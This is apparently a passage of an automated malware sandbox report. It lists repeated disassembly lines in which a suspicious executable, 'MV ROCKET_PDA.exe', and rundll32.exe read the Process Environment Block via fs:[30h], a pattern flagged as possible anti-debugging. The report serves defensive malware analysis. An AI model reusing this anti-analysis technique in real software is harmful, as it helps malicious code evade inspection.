          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00AB3D34 mov eax, dword ptr fs:[00000030h]1_2_00AB3D34
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00AB3D34 mov eax, dword ptr fs:[00000030h]1_2_00AB3D34
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00AB3D34 mov eax, dword ptr fs:[00000030h]1_2_00AB3D34
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00AB3D34 mov eax, dword ptr fs:[00000030h]1_2_00AB3D34
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00AB3D34 mov eax, dword ptr fs:[00000030h]1_2_00AB3D34
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00AB3D34 mov eax, dword ptr fs:[00000030h]1_2_00AB3D34
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00AB3D34 mov eax, dword ptr fs:[00000030h]1_2_00AB3D34
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00AB3D34 mov eax, dword ptr fs:[00000030h]1_2_00AB3D34
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00AB3D34 mov eax, dword ptr fs:[00000030h]1_2_00AB3D34
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00ACC577 mov eax, dword ptr fs:[00000030h]1_2_00ACC577
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00ACC577 mov eax, dword ptr fs:[00000030h]1_2_00ACC577
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00AE3D43 mov eax, dword ptr fs:[00000030h]1_2_00AE3D43
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00B23540 mov eax, dword ptr fs:[00000030h]1_2_00B23540
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00B53D40 mov eax, dword ptr fs:[00000030h]1_2_00B53D40
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00AC7D50 mov eax, dword ptr fs:[00000030h]1_2_00AC7D50
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00B70EA5 mov eax, dword ptr fs:[00000030h]1_2_00B70EA5
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00B70EA5 mov eax, dword ptr fs:[00000030h]1_2_00B70EA5
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00B70EA5 mov eax, dword ptr fs:[00000030h]1_2_00B70EA5
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00B246A7 mov eax, dword ptr fs:[00000030h]1_2_00B246A7
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00B3FE87 mov eax, dword ptr fs:[00000030h]1_2_00B3FE87
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00AB76E2 mov eax, dword ptr fs:[00000030h]1_2_00AB76E2
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00AD16E0 mov ecx, dword ptr fs:[00000030h]1_2_00AD16E0
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00B78ED6 mov eax, dword ptr fs:[00000030h]1_2_00B78ED6
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00AD36CC mov eax, dword ptr fs:[00000030h]1_2_00AD36CC
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00AE8EC7 mov eax, dword ptr fs:[00000030h]1_2_00AE8EC7
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00B5FEC0 mov eax, dword ptr fs:[00000030h]1_2_00B5FEC0
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00B5FE3F mov eax, dword ptr fs:[00000030h]1_2_00B5FE3F
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00AAE620 mov eax, dword ptr fs:[00000030h]1_2_00AAE620
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00AAC600 mov eax, dword ptr fs:[00000030h]1_2_00AAC600
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00AAC600 mov eax, dword ptr fs:[00000030h]1_2_00AAC600
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00AAC600 mov eax, dword ptr fs:[00000030h]1_2_00AAC600
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00AD8E00 mov eax, dword ptr fs:[00000030h]1_2_00AD8E00
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00ADA61C mov eax, dword ptr fs:[00000030h]1_2_00ADA61C
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00ADA61C mov eax, dword ptr fs:[00000030h]1_2_00ADA61C
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00B61608 mov eax, dword ptr fs:[00000030h]1_2_00B61608
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00AB766D mov eax, dword ptr fs:[00000030h]1_2_00AB766D
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00ACAE73 mov eax, dword ptr fs:[00000030h]1_2_00ACAE73
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00ACAE73 mov eax, dword ptr fs:[00000030h]1_2_00ACAE73
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00ACAE73 mov eax, dword ptr fs:[00000030h]1_2_00ACAE73
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00ACAE73 mov eax, dword ptr fs:[00000030h]1_2_00ACAE73
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00ACAE73 mov eax, dword ptr fs:[00000030h]1_2_00ACAE73
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00AB7E41 mov eax, dword ptr fs:[00000030h]1_2_00AB7E41
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00AB7E41 mov eax, dword ptr fs:[00000030h]1_2_00AB7E41
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00AB7E41 mov eax, dword ptr fs:[00000030h]1_2_00AB7E41
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00AB7E41 mov eax, dword ptr fs:[00000030h]1_2_00AB7E41
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00AB7E41 mov eax, dword ptr fs:[00000030h]1_2_00AB7E41
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00AB7E41 mov eax, dword ptr fs:[00000030h]1_2_00AB7E41
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00B6AE44 mov eax, dword ptr fs:[00000030h]1_2_00B6AE44
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00B6AE44 mov eax, dword ptr fs:[00000030h]1_2_00B6AE44
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00B27794 mov eax, dword ptr fs:[00000030h]1_2_00B27794
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00B27794 mov eax, dword ptr fs:[00000030h]1_2_00B27794
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00B27794 mov eax, dword ptr fs:[00000030h]1_2_00B27794
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00AB8794 mov eax, dword ptr fs:[00000030h]1_2_00AB8794
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00AE37F5 mov eax, dword ptr fs:[00000030h]1_2_00AE37F5
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00AA4F2E mov eax, dword ptr fs:[00000030h]1_2_00AA4F2E
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00AA4F2E mov eax, dword ptr fs:[00000030h]1_2_00AA4F2E
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00ADE730 mov eax, dword ptr fs:[00000030h]1_2_00ADE730
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00B3FF10 mov eax, dword ptr fs:[00000030h]1_2_00B3FF10
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00B3FF10 mov eax, dword ptr fs:[00000030h]1_2_00B3FF10
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00ADA70E mov eax, dword ptr fs:[00000030h]1_2_00ADA70E
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00ADA70E mov eax, dword ptr fs:[00000030h]1_2_00ADA70E
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00B7070D mov eax, dword ptr fs:[00000030h]1_2_00B7070D
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00B7070D mov eax, dword ptr fs:[00000030h]1_2_00B7070D
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00ACF716 mov eax, dword ptr fs:[00000030h]1_2_00ACF716
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00ABFF60 mov eax, dword ptr fs:[00000030h]1_2_00ABFF60
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00B78F6A mov eax, dword ptr fs:[00000030h]1_2_00B78F6A
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00ABEF40 mov eax, dword ptr fs:[00000030h]1_2_00ABEF40
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_05343D34 mov eax, dword ptr fs:[00000030h]13_2_05343D34
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_05343D34 mov eax, dword ptr fs:[00000030h]13_2_05343D34
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_05343D34 mov eax, dword ptr fs:[00000030h]13_2_05343D34
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_05343D34 mov eax, dword ptr fs:[00000030h]13_2_05343D34
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_05343D34 mov eax, dword ptr fs:[00000030h]13_2_05343D34
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_05343D34 mov eax, dword ptr fs:[00000030h]13_2_05343D34
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_05343D34 mov eax, dword ptr fs:[00000030h]13_2_05343D34
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_05343D34 mov eax, dword ptr fs:[00000030h]13_2_05343D34
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_05343D34 mov eax, dword ptr fs:[00000030h]13_2_05343D34
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_05343D34 mov eax, dword ptr fs:[00000030h]13_2_05343D34
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_05343D34 mov eax, dword ptr fs:[00000030h]13_2_05343D34
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_05343D34 mov eax, dword ptr fs:[00000030h]13_2_05343D34
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_05343D34 mov eax, dword ptr fs:[00000030h]13_2_05343D34
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0533AD30 mov eax, dword ptr fs:[00000030h]13_2_0533AD30
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_053FE539 mov eax, dword ptr fs:[00000030h]13_2_053FE539
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0536513A mov eax, dword ptr fs:[00000030h]13_2_0536513A
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0536513A mov eax, dword ptr fs:[00000030h]13_2_0536513A
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_053BA537 mov eax, dword ptr fs:[00000030h]13_2_053BA537
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_05364D3B mov eax, dword ptr fs:[00000030h]13_2_05364D3B
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_05364D3B mov eax, dword ptr fs:[00000030h]13_2_05364D3B
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_05364D3B mov eax, dword ptr fs:[00000030h]13_2_05364D3B
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_05354120 mov eax, dword ptr fs:[00000030h]13_2_05354120
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_05354120 mov eax, dword ptr fs:[00000030h]13_2_05354120
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_05354120 mov eax, dword ptr fs:[00000030h]13_2_05354120
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_05354120 mov eax, dword ptr fs:[00000030h]13_2_05354120
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_05354120 mov ecx, dword ptr fs:[00000030h]13_2_05354120
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_05339100 mov eax, dword ptr fs:[00000030h]13_2_05339100
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_05339100 mov eax, dword ptr fs:[00000030h]13_2_05339100
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_05339100 mov eax, dword ptr fs:[00000030h]13_2_05339100
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0533B171 mov eax, dword ptr fs:[00000030h]13_2_0533B171
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0533B171 mov eax, dword ptr fs:[00000030h]13_2_0533B171
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0535C577 mov eax, dword ptr fs:[00000030h]13_2_0535C577
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0535C577 mov eax, dword ptr fs:[00000030h]13_2_0535C577
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0533C962 mov eax, dword ptr fs:[00000030h]13_2_0533C962
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_05357D50 mov eax, dword ptr fs:[00000030h]13_2_05357D50
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0535B944 mov eax, dword ptr fs:[00000030h]13_2_0535B944
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0535B944 mov eax, dword ptr fs:[00000030h]13_2_0535B944
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_05408D34 mov eax, dword ptr fs:[00000030h]13_2_05408D34
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_05373D43 mov eax, dword ptr fs:[00000030h]13_2_05373D43
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_053B3540 mov eax, dword ptr fs:[00000030h]13_2_053B3540
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_05361DB5 mov eax, dword ptr fs:[00000030h]13_2_05361DB5
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_05361DB5 mov eax, dword ptr fs:[00000030h]13_2_05361DB5
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_05361DB5 mov eax, dword ptr fs:[00000030h]13_2_05361DB5
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_053B51BE mov eax, dword ptr fs:[00000030h]13_2_053B51BE
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_053B51BE mov eax, dword ptr fs:[00000030h]13_2_053B51BE
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_053B51BE mov eax, dword ptr fs:[00000030h]13_2_053B51BE
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_053B51BE mov eax, dword ptr fs:[00000030h]13_2_053B51BE
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_053661A0 mov eax, dword ptr fs:[00000030h]13_2_053661A0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_053661A0 mov eax, dword ptr fs:[00000030h]13_2_053661A0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_053635A1 mov eax, dword ptr fs:[00000030h]13_2_053635A1
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_053B69A6 mov eax, dword ptr fs:[00000030h]13_2_053B69A6
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_05362990 mov eax, dword ptr fs:[00000030h]13_2_05362990
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0536FD9B mov eax, dword ptr fs:[00000030h]13_2_0536FD9B
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0536FD9B mov eax, dword ptr fs:[00000030h]13_2_0536FD9B
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0536A185 mov eax, dword ptr fs:[00000030h]13_2_0536A185
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0535C182 mov eax, dword ptr fs:[00000030h]13_2_0535C182
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_05362581 mov eax, dword ptr fs:[00000030h]13_2_05362581
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_05362581 mov eax, dword ptr fs:[00000030h]13_2_05362581
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_05362581 mov eax, dword ptr fs:[00000030h]13_2_05362581
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_05362581 mov eax, dword ptr fs:[00000030h]13_2_05362581
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_05332D8A mov eax, dword ptr fs:[00000030h]13_2_05332D8A
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_05332D8A mov eax, dword ptr fs:[00000030h]13_2_05332D8A
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_05332D8A mov eax, dword ptr fs:[00000030h]13_2_05332D8A
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_05332D8A mov eax, dword ptr fs:[00000030h]13_2_05332D8A
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_05332D8A mov eax, dword ptr fs:[00000030h]13_2_05332D8A
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_053E8DF1 mov eax, dword ptr fs:[00000030h]13_2_053E8DF1
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0533B1E1 mov eax, dword ptr fs:[00000030h]13_2_0533B1E1
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0533B1E1 mov eax, dword ptr fs:[00000030h]13_2_0533B1E1
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0533B1E1 mov eax, dword ptr fs:[00000030h]13_2_0533B1E1
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_053C41E8 mov eax, dword ptr fs:[00000030h]13_2_053C41E8
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0534D5E0 mov eax, dword ptr fs:[00000030h]13_2_0534D5E0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0534D5E0 mov eax, dword ptr fs:[00000030h]13_2_0534D5E0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_053FFDE2 mov eax, dword ptr fs:[00000030h]13_2_053FFDE2
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_053FFDE2 mov eax, dword ptr fs:[00000030h]13_2_053FFDE2
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_053FFDE2 mov eax, dword ptr fs:[00000030h]13_2_053FFDE2
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_053FFDE2 mov eax, dword ptr fs:[00000030h]13_2_053FFDE2
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_054005AC mov eax, dword ptr fs:[00000030h]13_2_054005AC
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_054005AC mov eax, dword ptr fs:[00000030h]13_2_054005AC
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_053B6DC9 mov eax, dword ptr fs:[00000030h]13_2_053B6DC9
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_053B6DC9 mov eax, dword ptr fs:[00000030h]13_2_053B6DC9
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_053B6DC9 mov eax, dword ptr fs:[00000030h]13_2_053B6DC9
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_053B6DC9 mov ecx, dword ptr fs:[00000030h]13_2_053B6DC9
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_053B6DC9 mov eax, dword ptr fs:[00000030h]13_2_053B6DC9
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_053B6DC9 mov eax, dword ptr fs:[00000030h]13_2_053B6DC9
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0536BC2C mov eax, dword ptr fs:[00000030h]13_2_0536BC2C
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0536002D mov eax, dword ptr fs:[00000030h]13_2_0536002D
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0536002D mov eax, dword ptr fs:[00000030h]13_2_0536002D
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0536002D mov eax, dword ptr fs:[00000030h]13_2_0536002D
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0536002D mov eax, dword ptr fs:[00000030h]13_2_0536002D
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0536002D mov eax, dword ptr fs:[00000030h]13_2_0536002D
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0534B02A mov eax, dword ptr fs:[00000030h]13_2_0534B02A
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0534B02A mov eax, dword ptr fs:[00000030h]13_2_0534B02A
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0534B02A mov eax, dword ptr fs:[00000030h]13_2_0534B02A
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0534B02A mov eax, dword ptr fs:[00000030h]13_2_0534B02A
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_053B7016 mov eax, dword ptr fs:[00000030h]13_2_053B7016
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_053B7016 mov eax, dword ptr fs:[00000030h]13_2_053B7016
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_053B7016 mov eax, dword ptr fs:[00000030h]13_2_053B7016
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_053B6C0A mov eax, dword ptr fs:[00000030h]13_2_053B6C0A
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_053B6C0A mov eax, dword ptr fs:[00000030h]13_2_053B6C0A
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_053B6C0A mov eax, dword ptr fs:[00000030h]13_2_053B6C0A
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_053B6C0A mov eax, dword ptr fs:[00000030h]13_2_053B6C0A
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_05401074 mov eax, dword ptr fs:[00000030h]13_2_05401074
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_053F1C06 mov eax, dword ptr fs:[00000030h]13_2_053F1C06
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_053F1C06 mov eax, dword ptr fs:[00000030h]13_2_053F1C06
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_053F1C06 mov eax, dword ptr fs:[00000030h]13_2_053F1C06
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_053F1C06 mov eax, dword ptr fs:[00000030h]13_2_053F1C06
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_053F1C06 mov eax, dword ptr fs:[00000030h]13_2_053F1C06
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_053F1C06 mov eax, dword ptr fs:[00000030h]13_2_053F1C06
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_053F1C06 mov eax, dword ptr fs:[00000030h]13_2_053F1C06
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_053F1C06 mov eax, dword ptr fs:[00000030h]13_2_053F1C06
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_053F1C06 mov eax, dword ptr fs:[00000030h]13_2_053F1C06
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_053F1C06 mov eax, dword ptr fs:[00000030h]13_2_053F1C06
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_053F1C06 mov eax, dword ptr fs:[00000030h]13_2_053F1C06
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_053F1C06 mov eax, dword ptr fs:[00000030h]13_2_053F1C06
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_053F1C06 mov eax, dword ptr fs:[00000030h]13_2_053F1C06
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_053F1C06 mov eax, dword ptr fs:[00000030h]13_2_053F1C06
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_053F2073 mov eax, dword ptr fs:[00000030h]13_2_053F2073
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0540740D mov eax, dword ptr fs:[00000030h]13_2_0540740D
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0540740D mov eax, dword ptr fs:[00000030h]13_2_0540740D
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0540740D mov eax, dword ptr fs:[00000030h]13_2_0540740D
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_05404015 mov eax, dword ptr fs:[00000030h]13_2_05404015
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_05404015 mov eax, dword ptr fs:[00000030h]13_2_05404015
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0535746D mov eax, dword ptr fs:[00000030h]13_2_0535746D
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_05350050 mov eax, dword ptr fs:[00000030h]13_2_05350050
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_05350050 mov eax, dword ptr fs:[00000030h]13_2_05350050
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_053CC450 mov eax, dword ptr fs:[00000030h]13_2_053CC450
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_053CC450 mov eax, dword ptr fs:[00000030h]13_2_053CC450
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0536A44B mov eax, dword ptr fs:[00000030h]13_2_0536A44B
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0536F0BF mov ecx, dword ptr fs:[00000030h]13_2_0536F0BF
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0536F0BF mov eax, dword ptr fs:[00000030h]13_2_0536F0BF
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0536F0BF mov eax, dword ptr fs:[00000030h]13_2_0536F0BF
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_05408CD6 mov eax, dword ptr fs:[00000030h]13_2_05408CD6
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_053620A0 mov eax, dword ptr fs:[00000030h]13_2_053620A0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_053620A0 mov eax, dword ptr fs:[00000030h]13_2_053620A0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_053620A0 mov eax, dword ptr fs:[00000030h]13_2_053620A0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_053620A0 mov eax, dword ptr fs:[00000030h]13_2_053620A0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_053620A0 mov eax, dword ptr fs:[00000030h]13_2_053620A0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_053620A0 mov eax, dword ptr fs:[00000030h]13_2_053620A0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_053790AF mov eax, dword ptr fs:[00000030h]13_2_053790AF
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0534849B mov eax, dword ptr fs:[00000030h]13_2_0534849B
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_05339080 mov eax, dword ptr fs:[00000030h]13_2_05339080
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_053B3884 mov eax, dword ptr fs:[00000030h]13_2_053B3884
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_053B3884 mov eax, dword ptr fs:[00000030h]13_2_053B3884
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_053F14FB mov eax, dword ptr fs:[00000030h]13_2_053F14FB
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_053B6CF0 mov eax, dword ptr fs:[00000030h]13_2_053B6CF0
